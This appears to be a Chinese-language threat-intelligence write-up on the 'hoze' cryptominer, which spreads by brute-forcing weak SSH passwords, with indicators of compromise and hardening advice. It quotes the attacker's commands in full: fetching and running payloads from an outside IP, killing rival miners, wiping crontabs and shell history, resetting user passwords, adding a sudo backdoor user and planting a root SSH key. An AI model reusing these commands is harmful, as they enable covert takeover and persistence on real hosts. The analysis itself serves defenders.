简述
hoze样本为挖矿样本,感染x86_64主机,通过多个样本/脚本链式启动,并且会及时清理自身痕迹,还会进行添加用户、密码、公钥等持久化行为。
elkeid 样本ID
elkeid_20221106_miner_6
捕获时间
- 20221106
最近活跃时间
- 20221118
关键词
hoze,secure
已知入侵途径
- 弱口令爆破
涉及样本
执行目录
- /etc
- /var/tmp
- /tmp
- .xrx
样本
-
hoze
- 经过代码混淆的恶意shell脚本,同时也作为启动脚本
-
newinit.sh
- 不详
-
zzh
- 不详
-
xrx
- elf文件, 挖矿木马
-
init.sh
- 实际为elf文件,代理木马
-
init0
- elf文件,代理木马
-
uninstall.sh
- shell文件
-
config.json
- 配置文件
-
key
- RSA公钥
-
scp
- shell文件, 可启动/dev/shm/.x/secure
-
secure
- elf文件,代理木马
-
passwd
- elf文件, 木马
主要行为
-
ssh行为
-
收集信息
- curl ipinfo.io/org
- bash -c nvidia-smi -q | grep Product Name | head -n 1 | awk {print $4, $5, $6, $7, $8, $9}
-
下载并赋权执行hoze
- bash -c cd /var/tmp ; curl -O 185.252.178.82:6972/hoze || cd1 -O 185.252.178.82:6972/hoze || wget 185.252.178.82:6972/hoze ; chmod +x hoze ; ./hoze
-
-
hoze行为
-
采集信息
- nproc;
- cat /proc/meminfo | grep MemAvailable | awk '{print$2}';
-
清理自身
- rm -rf hoze
- rm -rf /var/tmp/hoze
-
清理竞品
- rm -rf ~/xmrig*
- rm -rf ~/c3pool*
- pkill -STOP xmrig
- pkill -STOP Opera
- pkill -STOP kthreaddk
- pkill -STOP kdevtmpfsi
- rm -rf /usr/local/bin/pnscan > /dev/null 2>&1
- pkill -f "pnscan" > /dev/null 2>&1
- chattr -ia /etc/zzh > /dev/null 2>&1
- chattr -ia /tmp/zzh > /dev/null 2>&1
- rm -rf /etc/zzh > /dev/null 2>&1
- rm -rf /tmp/zzh > /dev/null 2>&1
- pkill -f "zzh" > /dev/null 2>&1
- chattr -ia /tmp/.ice-unix > /dev/null 2>&1
- rm -rf /tmp/.ice-unix > /dev/null 2>&1
- chattr -ia /usr/local/bin/pnscan > /dev/null 2>&1
-
下载执行"init0"
- cd /var/tmp ; curl -O 185.252.178.82:6972/xrx.tar || cd1 -O 185.252.178.82:6972/xrx.tar || wget 185.252.178.82:6972/xrx.tar && tar -xvf xrx.tar && mv xrx .xrx && rm -rf xrx.tar && cd .xrx ; chmod +x * ; ./init0 ;
-
清理痕迹(删除文件、清理进程、清理定时任务、清除缓存)
- rm -rf /var/tmp/.xri
- rm -rf /var/tmp/.xrx
- rm -rf /var/tmp/.x
- rm -rf ~/.configrc4
- rm -rf /tmp/.locald
- pkill -9 .system3d
- rm -rf /var/tmp/.a
- rm -rf /var/tmp/.ladyg0g0
- rm -rf /usr/lib/updated/*
- pkill -9 xri
- pkill -9 xrx
- pkill -STOP xxi
- pkill -9 arx645
- pkill -9 zzh
- pkill -9 SRBMiner
- pkill -9 DaggerRandomx
- pkill -9 dhcpd
- pkill -9 perl
- rm -rf ~/Opera
- chmod 755 /usr/bin/chattr > /dev/null 2>&1
- chattr -ia /etc/newinit.sh > /dev/null 2>&1
- rm -rf /etc/newinit.sh > /dev/null 2>&1
- chattr -R -ia /var/spool/cron > /dev/null 2>&1
- chattr -ia /etc/crontab > /dev/null 2>&1
- rm -rf /etc/crontab > /dev/null 2>&1
- touch /etc/crontab > /dev/null 2>&1
- chattr -R -ia /var/spool/cron/crontabs > /dev/null 2>&1
- chattr -R -ia /etc/cron.d > /dev/null 2>&1
- rm -rf /etc/ld.so.preload > /dev/null 2>&1
- rm -rf /etc/libsystem.so > /dev/null 2>&1
- sync; echo 1 > /proc/sys/vm/drop_caches ; sync; echo 2 > /proc/sys/vm/drop_caches ; sync; echo 3 > /proc/sys/vm/drop_caches
- crontab -l
- crontab -r > /dev/null 2>&1
- mv -f /bin/top.original /bin/top > /dev/null 2>&1
-
-
init0行为
-
下载执行"secure"、"init.sh"
- curl -sO http://185.252.178.82:6972/passwd
- cp /bin/passwd /usr/bin/passwd
- chmod u+s /bin/passwd
- chmod 4755 /bin/passwd
- chattr -ia /etc/passwd
- chattr -iae /usr/bin/passwd
- mv /usr/bin/passwd /usr/bin/passwd.orig
- mkdir /var/tmp/.x
- mv /var/tmp/.xrx/secure /var/tmp/.x/secure
- chmod +x /var/tmp/.x/secure
- /var/tmp/.x/secure -c
- /var/tmp/.x/secure -c exec '/var/tmp/.x/secure' "$@" /var/tmp/.x/secure
- ./init.sh -c exec './init.sh' "$@" ./init.sh hide
-
批量修改用户密码
- usermod -p $6$u3a2aCKC$TULEOlBwPWBIAYZkG0NNNbWM.9tRozeHUO2HyRvlTQpekaOQ2E3S5E5/gqyOnVAtaF8G41oZS0KRioLw7PfzT1 ubuntu
- usermod -p $6$u3a2aCKC$TULEOlBwPWBIAYZkG0NNNbWM.9tRozeHUO2HyRvlTQpekaOQ2E3S5E5/gqyOnVAtaF8G41oZS0KRioLw7PfzT1 mcserver
- usermod -p $6$u3a2aCKC$TULEOlBwPWBIAYZkG0NNNbWM.9tRozeHUO2HyRvlTQpekaOQ2E3S5E5/gqyOnVAtaF8G41oZS0KRioLw7PfzT1 kwinfo
- usermod -p $6$u3a2aCKC$TULEOlBwPWBIAYZkG0NNNbWM.9tRozeHUO2HyRvlTQpekaOQ2E3S5E5/gqyOnVAtaF8G41oZS0KRioLw7PfzT1 testuser
- ......
-
添加权限
- useradd cheeki
- usermod -aG sudo cheeki
- mv key /root/.ssh/authorized_keys
-
清理痕迹
- rm -rf /var/tmp/.xrx/init0
- rm -rf /root/.bash_history
- pkill -9 xri
- pkill -STOP xmu
- pkill -STOP xxi
- /var/tmp/.xrx/uninstall.sh
-
-
secure行为
-
执行xrx
- grep -q secure
- /var/tmp/.xrx/xrx
- cat /etc/crontab
- sleep 1
- pgrep xrx
-
-
init.sh行为
-
执行xrx
- pidof xrx
- ./xrx
- mount -o bind /var/tmp/... /proc/568
-
IOC
URL | sha256 |
---|---|
185.252.178.82:6972/hoze | hoze:d5c429ab6e638bec352eaf8616354917ad87d6e1e9122efa27c75af83f9d91fe |
http://185.252.178.82:6972/passwd | passwd:cb7d520296116df898c01bb9e94c05efcaa38dffb14354f42b62262c5b147e34 |
185.252.178.82:6972/xrx.tar | xrx:fb86120a4a1b13b29957eb5f95f7857cf9e469514fc20d25fad02ae87bf99091 |
185.252.178.82:6972/xrx.tar | scp:fc26873006164decacbcfb01d246b54539b786b404be0bb1a5cde5263031663a |
185.252.178.82:6972/xrx.tar | secure:32d1d84f483e667a55f77f70064086bacfe58994cb6e951410265df831535a79 |
185.252.178.82:6972/xrx.tar | init.sh:a5d094b18c2ed9c0e341f49554bae4987445c92cb09bcc88c21a45c56c5c1d99 |
185.252.178.82:6972/xrx.tar | init0:0847491b96e6446dd3c3d340f7e837858663c559080e5f36b3510b3f60f0be82 |
已知情报
- https://www.virustotal.com/gui/file/fb86120a4a1b13b29957eb5f95f7857cf9e469514fc20d25fad02ae87bf99091
- https://www.virustotal.com/gui/file/32d1d84f483e667a55f77f70064086bacfe58994cb6e951410265df831535a79
- https://www.virustotal.com/gui/file/a5d094b18c2ed9c0e341f49554bae4987445c92cb09bcc88c21a45c56c5c1d99
- https://www.virustotal.com/gui/file/0847491b96e6446dd3c3d340f7e837858663c559080e5f36b3510b3f60f0be82
- https://misakikata.github.io/2022/02/XMR%E9%97%A8%E7%BD%97%E5%B8%81%E6%8C%96%E7%9F%BF%E5%BA%94%E6%80%A5/
安全配置建议
- 避免使用弱密码或默认密码
参考链接
https://misakikata.github.io/2022/02/XMR%E9%97%A8%E7%BD%97%E5%B8%81%E6%8C%96%E7%9F%BF%E5%BA%94%E6%80%A5/